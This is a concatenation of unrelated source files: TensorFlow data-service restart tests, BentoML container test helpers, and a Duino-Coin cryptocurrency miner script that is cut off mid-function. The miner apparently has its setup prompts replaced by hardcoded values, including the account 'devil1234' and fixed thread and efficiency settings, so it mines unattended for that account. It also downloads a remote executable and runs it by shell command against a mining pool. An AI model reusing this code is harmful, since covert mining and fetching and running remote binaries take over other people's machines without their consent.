@combinations.generate(test_base.eager_only_combinations())
def testDispatcherAndMultiWorkerRestart(self):
num_workers = 2
cluster = data_service_test_base.TestCluster(num_workers=num_workers)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
cluster.restart_dispatcher()
for worker_index in range(num_workers):
cluster.workers[worker_index].restart()
for elem in iterator:
results.append(elem.numpy())
self.assertCountEqual(num_workers * list(range(num_elements)), results)
cluster.restart_dispatcher()
for worker_index in range(num_workers):
cluster.workers[worker_index].restart()
for elem in iterator:
results.append(elem.numpy())
self.assertCountEqual(num_workers * list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testStartServersLate(self):
# Test that the data service client performs retries instead of failing when
# the dataset is created before the master and worker are started.
try:
import portpicker # pylint: disable=g-import-not-at-top
dispatcher_port = portpicker.pick_unused_port()
except:
raise self.skipTest("Flakes in portpicker library do not represent "
"TensorFlow errors.")
cluster = data_service_test_base.TestCluster(
num_workers=1, dispatcher_port=dispatcher_port, start=False)
def start_servers():
time.sleep(0.5)
cluster.start_dispatcher()
cluster.start_workers()
start_servers_thread = threading.Thread(target=start_servers, daemon=True)
start_servers_thread.start()
num_elements = 10
ds = self.make_distributed_range_dataset(num_elements, cluster)
results = [elem.numpy() for elem in ds]
self.assertEqual(list(range(num_elements)), results)
start_servers_thread.join()
@combinations.generate(test_base.eager_only_combinations())
def testAddWorkerMidJob(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
# Read halfway through the dataset.
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
cluster.add_worker()
# Wait for the new worker to register with the dispatcher.
while cluster.num_registered_workers() < 2:
time.sleep(10 / 1000) # 10ms
for elem in iterator:
results.append(elem.numpy())
self.assertCountEqual(2 * list(range(num_elements)), results)
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
combinations.combine(use_same_port=[True, False]),
data_service_test_base.all_cluster_configurations()))
def testRestartWorker(self, use_same_port, work_dir, fault_tolerant_mode):
cluster = data_service_test_base.TestCluster(
num_workers=1,
work_dir=work_dir,
fault_tolerant_mode=fault_tolerant_mode)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
# Read halfway through the dataset.
midpoint = num_elements // 2
for i in range(midpoint):
self.assertEqual(i, next(iterator).numpy())
# Stop the original worker and start a new one.
cluster.workers[0].restart(use_same_port=use_same_port)
# There may have been some elements prefetched from the first worker
# before it was stopped.
while True:
val = next(iterator).numpy()
if val == 0:
break
# The dataset starts over now that we read from the new worker.
# TODO(b/157086991): Iterate until end of sequence when we support
# detecting lost workers.
for i in range(1, num_elements // 2):
val = next(iterator).numpy()
self.assertEqual(i, val)
@combinations.generate(test_base.eager_only_combinations())
def testChangeProcessingModeAfterRestart(self):
self.skipTest("b/170910141")
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
range_dataset = dataset_ops.Dataset.range(num_elements)
ds = range_dataset.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs",
service=cluster.dispatcher_address(),
job_name="test"))
iterator = iter(ds)
for i in range(num_elements // 2):
self.assertEqual(i, next(iterator).numpy())
cluster.restart_dispatcher()
ds = range_dataset.apply(
data_service_ops.distribute(
processing_mode="distributed_epoch",
service=cluster.dispatcher_address(),
job_name="test"))
with self.assertRaisesOpError("already an existing job with that name "
"using processing mode <parallel_epochs>"):
next(iter(ds)).numpy()
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(work_dir=[TMP_WORK_DIR, NO_WORK_DIR])))
def testDistributeLargeGraphThenRegisterWorker(self, work_dir):
cluster = data_service_test_base.TestCluster(
num_workers=0, work_dir=work_dir, fault_tolerant_mode=False)
# Larger than default OSS grpc message size limit of 4MB.
tensor = array_ops.ones((2, 1000, 1000), dtype=dtypes.float32)
ds = dataset_ops.Dataset.from_tensors(tensor)
ds = self.make_distributed_dataset(ds, cluster)
it = iter(ds)
cluster.add_worker()
self.assertAllEqual(next(it), tensor)
if __name__ == "__main__":
test.main()
|
utils.py
|
# pylint: disable=redefined-outer-name
from contextlib import contextmanager
import logging
import os
import subprocess
import sys
import threading
import time
import urllib
import docker
import bentoml
from bentoml.utils import cached_contextmanager
logger = logging.getLogger("bentoml.tests")
def wait_until_container_ready(container_name, check_message, timeout_seconds=120):
docker_client = docker.from_env()
start_time = time.time()
while True:
time.sleep(1)
# Raise timeout, if exceeds timeout limit
if time.time() - start_time > timeout_seconds:
raise TimeoutError(f'Waiting for container "{container_name}" timed out')
try:
container_list = docker_client.containers.list(
filters={'name': container_name}
)
if not container_list:
continue
except docker.errors.NotFound:
continue
logger.info("Container list: " + str(container_list))
assert (
len(container_list) == 1
), f'should be exact one container with name {container_name}'
container_log = container_list[0].logs().decode()
if check_message in container_log:
logger.info(
f"Found message indicating container readiness in container log: "
f"{container_log}"
)
break
def _wait_until_api_server_ready(host_url, timeout, container=None, check_interval=1):
start_time = time.time()
proxy_handler = urllib.request.ProxyHandler({})
opener = urllib.request.build_opener(proxy_handler)
ex = None
while time.time() - start_time < timeout:
try:
if opener.open(f'http://{host_url}/healthz', timeout=1).status == 200:
return
elif container and container.status != "running":
break
else:
logger.info("Waiting for host %s to be ready..", host_url)
time.sleep(check_interval)
except Exception as e: # pylint:disable=broad-except
logger.info(f"retrying to connect to the host {host_url}...")
ex = e
time.sleep(check_interval)
finally:
if container:
container_logs = container.logs()
if container_logs:
logger.info(f"Container {container.id} logs:")
for log_record in container_logs.decode().split('\r\n'):
logger.info(f">>> {log_record}")
else:
logger.info("Timeout!")
raise AssertionError(
f"Timed out waiting {timeout} seconds for Server {host_url} to be ready, "
f"exception: {ex}"
)
@contextmanager
def export_service_bundle(bento_service):
"""
Export a bentoml service to a temporary directory, yield the path.
Delete the temporary directory on close.
"""
import tempfile
with tempfile.TemporaryDirectory() as path:
bento_service.save_to_dir(path)
yield path
@cached_contextmanager("{saved_bundle_path}, {image_tag}")
def build_api_server_docker_image(saved_bundle_path, image_tag="test_bentoml_server"):
"""
Build the docker image for a saved bentoml bundle, yield the docker image object.
"""
import docker
client = docker.from_env()
logger.info(
f"Building API server docker image from build context: {saved_bundle_path}"
)
try:
image, _ = client.images.build(path=saved_bundle_path, tag=image_tag, rm=False)
yield image
client.images.remove(image.id)
except docker.errors.BuildError as e:
for line in e.build_log:
if 'stream' in line:
print(line['stream'].strip())
raise
@cached_contextmanager("{image.id}")
def run_api_server_docker_container(image, config_file=None, timeout=60):
"""
Launch a bentoml service container from a docker image, yields the host URL.
"""
import docker
client = docker.from_env()
with bentoml.utils.reserve_free_port() as port:
pass
command_args = "--workers 1"
if config_file is not None:
environment = ["BENTOML_CONFIG=/home/bentoml/bentoml_config.yml"]
volumes = {
os.path.abspath(config_file): {
"bind": "/home/bentoml/bentoml_config.yml",
"mode": "ro",
}
}
else:
environment = None
volumes = None
container = client.containers.run(
image=image.id,
command=command_args,
tty=True,
ports={'5000/tcp': port},
detach=True,
volumes=volumes,
environment=environment,
)
try:
host_url = f"127.0.0.1:{port}"
_wait_until_api_server_ready(host_url, timeout, container)
yield host_url
finally:
print(container.logs())
container.stop()
container.remove()
time.sleep(1) # make sure container stopped & deleted
@contextmanager
def run_api_server(bundle_path, config_file=None, dev_server=False, timeout=20):
"""
Launch a bentoml service directly by the bentoml CLI, yields the host URL.
"""
if dev_server:
serve_cmd = "serve"
else:
serve_cmd = "serve-gunicorn"
my_env = os.environ.copy()
with bentoml.utils.reserve_free_port() as port:
cmd = [sys.executable, "-m", "bentoml", serve_cmd]
if port:
cmd += ['--port', f'{port}']
cmd += [bundle_path]
def print_log(p):
try:
for line in p.stdout:
print(line.decode(), end='')
except ValueError:
pass
if config_file is not None:
my_env["BENTOML_CONFIG"] = os.path.abspath(config_file)
p = subprocess.Popen(
cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=my_env,
)
try:
threading.Thread(target=print_log, args=(p,), daemon=True).start()
host_url = f"127.0.0.1:{port}"
_wait_until_api_server_ready(host_url, timeout=timeout)
yield host_url
finally:
# TODO: can not terminate the subprocess on Windows
p.terminate()
p.wait()
|
pc_miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.5.6)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from platform import machine as osprocessor
from os import path, system
from os import system as ossystem
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock
from random import choice
import pip
import select
thread_lock = Lock()
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed - "
+ "Xxhash support will be disabled")
xxhash_enabled = False
# Global variables
MINER_VER = "2.56" # Version number
NODE_ADDRESS = "server.duinocoin.com"
AVAILABLE_PORTS = [
2813, # PC (1)
2814, # PC (2)
2815, # PC (3)
2812, # Wallets, other miners
2811 # Legacy
]
SOC_TIMEOUT = 45 # Socket timeout
PERIODIC_REPORT_TIME = 60
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
discord_presence = "y"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["Duino-Coin-PC-Miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
lang = "english"
lang = "english"
def getString(string_name):
# Get string form language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debug_output(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
pretty_print(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + " seconds"
elif uptime == 60:
return str(round(uptime // 60)) + " minute"
elif uptime >= 60:
return str(round(uptime // 60)) + " minutes"
elif uptime == 3600:
return str(round(uptime // 3600)) + " hour"
elif uptime >= 3600:
return str(round(uptime // 3600)) + " hours"
def get_prefix(diff: int):
if diff >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif diff >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif diff >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.YELLOW
+ getString("translation_autor"))
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debug_output("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " ⚙ "
+ diffName)
if rig_identiier != "None":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identiier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
if int(donation_level) > 0:
if osname == "nt":
if not Path(RESOURCES_DIR + "/Donate_executable.exe").is_file():
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableWindows.exe?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable.exe", "wb") as f:
f.write(r.content)
elif osname == "posix":
if osprocessor() == "aarch64":
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableAARCH64?raw=true")
elif osprocessor() == "armv7l":
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableAARCH32?raw=true")
else:
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableLinux?raw=true")
if not Path(RESOURCES_DIR + "/Donate_executable").is_file():
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable", "wb") as f:
f.write(r.content)
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
global rig_identiier
global lang
global algorithm
global SOC_TIMEOUT
global discord_presence
global PERIODIC_REPORT_TIME
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = "devil1234"
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = "95"
threadcount = "8"
requested_diff = "2"
rig_identiier = "devil1234"
donation_level = "0"
# Check wheter efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
# Check wheter threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(8):
threadcount = 8
print(
Style.RESET_ALL
+ Style.BRIGHT
+ getString("max_threads_notice"))
elif int(threadcount) < int(1):
threadcount = 1
# Check wheter algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
# Check wheter diff setting is correct
if requested_diff == "1":
requested_diff = "LOW"
elif requested_diff == "2":
requested_diff = "MEDIUM"
else:
requested_diff = "MEDIUM"
# Check wheter donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == "":
donation_level = 1
elif float(donation_level) > int(5):
donation_level = 5
elif float(donation_level) < int(0):
donation_level = 0
# Format data
config["Duino-Coin-PC-Miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": 45,
"periodic_report": 60,
"discord_presence": "y"
}
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["Duino-Coin-PC-Miner"]["username"]
efficiency = config["Duino-Coin-PC-Miner"]["efficiency"]
threadcount = config["Duino-Coin-PC-Miner"]["threads"]
requested_diff = config["Duino-Coin-PC-Miner"]["requested_diff"]
donation_level = config["Duino-Coin-PC-Miner"]["donate"]
algorithm = config["Duino-Coin-PC-Miner"]["algorithm"]
rig_identiier = config["Duino-Coin-PC-Miner"]["identifier"]
debug = config["Duino-Coin-PC-Miner"]["debug"]
SOC_TIMEOUT = int(config["Duino-Coin-PC-Miner"]["soc_timeout"])
discord_presence = config["Duino-Coin-PC-Miner"]["discord_presence"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-PC-Miner"]["periodic_report"])
efficiency = (100 - float(efficiency)) * 0.01
def Donate():
global donation_level
global donatorrunning
global donateExecutable
if osname == "nt":
cmd = (
"cd "
+ RESOURCES_DIR
+ "& Donate_executable.exe "
+ "-o stratum+tcp://xmg.minerclaim.net:3333 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
elif osname == "posix":
cmd = (
"cd "
+ RESOURCES_DIR
+ "&& chmod +x Donate_executable "
+ "&& ./Donate_executable "
+ "-o stratum+tcp://xmg.minerclaim.net:3333 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
if int(donation_level) <= 0:
pretty_print(
"sys0",
Fore.YELLOW
+ getString("free_network_warning")
+ getString("donate_warning")
+ Fore.GREEN
+ "https://duinocoin.com/donate"
+ Fore.YELLOW
+ getString("learn_more_donate"),
"warning")
sleep(10)
elif donatorrunning == False:
if int(donation_level) == 5:
cmd += "80"
elif int(donation_level) == 4:
cmd += "60"
elif int(donation_level) == 3:
cmd += "40"
elif int(donation_level) == 2:
cmd += "20"
elif int(donation_level) == 1:
cmd += "10"
if int(donation_level) > 0:
debug_output(getString("starting_donation"))
donatorrunning = True
# Launch CMD as subprocess
donateExecutable = Popen(
cmd, shell=True, stderr=DEVNULL)
pretty_print(
"sys0",
getString("thanks_donation"),
"warning")
def ducos1(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
# Loop from 1 too 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1res % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# XXHASH algorithm
# Measure starting time
timeStart = time()
# Loop from 1 too 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1xxres % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid: int,
accepted: int,
rejected: int,
requested_diff: str,
khashcount: int,
username: str,
efficiency: int,
rig_identiier: str,
algorithm: str,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS: str,
NODE_PORT: int):
# Mining section for every thread
start_time = time()
report_shares = 0
while True:
while True:
try:
retry_counter = 0
while True:
try:
if retry_counter >= 3:
debug_output(
'Error connecting after 3 retries, '
+ 'fetching new node IP')
NODE_ADDRESS, NODE_PORT = fetch_pools()
debug_output('Connecting to node ' +
str(NODE_ADDRESS) + ":" + str(NODE_PORT))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if server_version:
break
except Exception as e:
retry_counter += 1
pretty_print("net0",
" Error connecting to mining node: "
+ str(e)
+ ", retrying in 5s",
"error")
sleep(5)
if threadid == 0:
soc.send(bytes("MOTD", encoding="utf8"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
if threadid == 0:
if float(server_version) <= float(MINER_VER):
# Miner is up-to-date
pretty_print(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(server_version)
+ ", node: "
+ str(NODE_ADDRESS)
+ ":"
+ str(NODE_PORT)
+ ")",
"success")
else:
# Miner is outdated
pretty_print(
"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
sleep(5)
break
except Exception as e:
# Socket connection error
pretty_print(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
pretty_print(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(threadid) +
"Correct job received")
break
except:
pretty_print("cpu" + str(threadid),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff, efficiency)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff, efficiency)
computetimeStop = time()
computetime = computetimeStop - computetimeStart
debug_output("Thread "
+ str(threadid)
+ ": result found: "
+ str(result[0]))
# Convert to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
# Calculate total hashrate of all thrads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(result[0])
+ ","
+ str(result[1])
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
+ str(rig_identiier),
encoding="utf8"))
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip("\n")
responsetimestop = now()
ping = int((responsetimestop - responsetimetart
).microseconds / 1000)
debug_output("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
elif totalhashrate > 100:
# Format for >100 kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
else:
# Format for small hashrates
formattedhashcount = str(
"%02.1f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 1500
and accepted.value % 50 == 0):
pretty_print("sys0",
" " +
getString("max_hashrate_notice"),
"warning")
diff = get_prefix(diff)
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ⛏"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ⛏"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
